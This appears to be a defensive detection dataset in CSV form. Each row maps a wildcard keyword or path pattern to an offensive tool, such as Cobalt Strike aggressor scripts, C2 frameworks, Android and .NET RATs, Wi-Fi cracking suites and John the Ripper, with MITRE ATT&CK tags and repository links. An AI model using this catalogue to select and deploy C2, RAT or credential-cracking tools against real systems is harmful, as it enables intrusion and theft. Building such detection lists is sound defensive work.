-*agent/cmd_sleep.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_sysinfo.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/cmd_upload_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent/dll.nim*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*agent/elf.nim*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*agent/exe.nim*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*Agent/ratchatPT.go*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z
-*agent\cmd_download_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_exec.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_kill.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_proxy.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_run.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_shell.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_sleep.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_sysinfo.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent\cmd_upload_files.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agent_code/bash_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z
-*agent_dll.dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*agents/Follina-2*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*AggressiveProxy.cna*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z
-*aggressor.beacons*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*aggressor.bshell*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*aggressor.cna*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z
-*aggressor.dialog*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*aggressor.println*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*aggressor.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*Aggressor/TikiTorch*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z
-*AggressorScripts*,offensive_tool_keyword,AggressorScripts-1,Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources,T1074 - T1070 - T1105 - T1558,TA0007 - TA0003 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/AggressorScripts-1,1,1,N/A,N/A,1,1,1,2018-06-24T16:27:57Z,2019-10-18T12:56:35Z
-*aggressor-scripts*,offensive_tool_keyword,cobaltstrike,beacon generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/eddiezab/aggressor-scripts/tree/master,1,1,N/A,10,10,1,0,2021-01-29T21:01:58Z,2021-01-29T21:00:26Z
-*Aggressor-Scripts*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*ahmedkhlief/Ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*ahmedkhlief/Ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*AhMyth-Android-RAT*,offensive_tool_keyword,AhMyth-Android-RAT,AhMyth Android Rat,T1020 - T1071 - T1071.001,TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/AhMyth/AhMyth-Android-RAT,1,0,N/A,N/A,10,3977,1663,2021-08-12T21:23:08Z,2017-07-07T03:03:37Z
-*ahsten.run \*powershell.exe*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*aigmfoeogfnljhnofglledbhhfegannp*,greyware_tool_keyword,Lethean Proxy VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*Airbash*,offensive_tool_keyword,Airbash,A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.,T1565 - T1593 - T1594 - T1567,TA0002 - TA0007 - TA0009 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/tehw0lf/airbash,1,0,N/A,N/A,4,340,64,2021-10-26T09:47:34Z,2018-04-18T23:50:15Z
-*Aircrack-ng*,offensive_tool_keyword,aircrack-ng,WiFi security auditing tools suite.,T1110 - T1170 - T1180 - T1201 - T1213,TA0001 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/aircrack-ng/aircrack-ng,1,0,N/A,N/A,10,4234,838,2023-09-30T22:40:36Z,2018-03-10T17:11:11Z
-*aircrack-ng*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z
-*aireplay-ng *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*aireplay-ng *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*Airgeddon*,offensive_tool_keyword,Airgeddon,This is a multi-use bash script for Linux systems to audit wireless networks.,T1590 - T1533 - T1170 - T1583.001,TA0002 - TA0003 - ,N/A,N/A,Network Exploitation tools,https://github.com/v1s1t0r1sh3r3/airgeddon,1,0,N/A,N/A,10,5428,1104,2023-10-02T21:32:56Z,2016-03-18T10:34:56Z
-*airman604/splunk_whisperer*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z
-*airmon-ng*,offensive_tool_keyword,airmon-ng,This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode,T1018 - T1040,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.aircrack-ng.org/doku.php?id=airmon-ng,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*airodump-ng *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*airpwn-ng*,offensive_tool_keyword,airpwn-ng,We force the targets browser to do what we want,T1562 - T1564 - T1565 - T1566 - T1567 - T1573,TA0005 - TA0007 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/ICSec/airpwn-ng,1,1,N/A,N/A,1,23,11,2022-11-07T02:22:34Z,2021-07-20T03:43:13Z
-*aix2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*aix2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*ajpc500/BOFs*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z
